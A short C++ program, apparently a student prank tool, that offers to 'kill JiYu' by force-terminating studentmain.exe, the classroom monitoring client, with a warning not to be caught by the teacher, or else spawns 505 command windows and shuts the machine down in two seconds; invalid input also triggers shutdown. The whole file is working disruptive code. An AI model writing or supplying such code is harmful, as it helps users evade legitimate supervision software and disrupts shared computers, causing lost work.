#include <bits/stdc++.h>
using namespace std;
int main()
{
cout << "欢迎来到极域杀手的世界" << endl;
cout << "你现在有两个选择: 1、杀掉极域 2、有趣的东西" << endl;
int x;
cin >> x;
if (x == 1)
{
system("taskkill /f /im studentmain.exe");
cout << "极域已删掉,小心被老师发现" << endl;
}
else if (x == 2)
{
int d = 505;
while (d--)
{
system("start cmd");
}
system("shutdown -s -t 2");
}
else
{
cout << "只有两个选择" << endl;
system("shutdown -s -t 2");
}
return 0;
}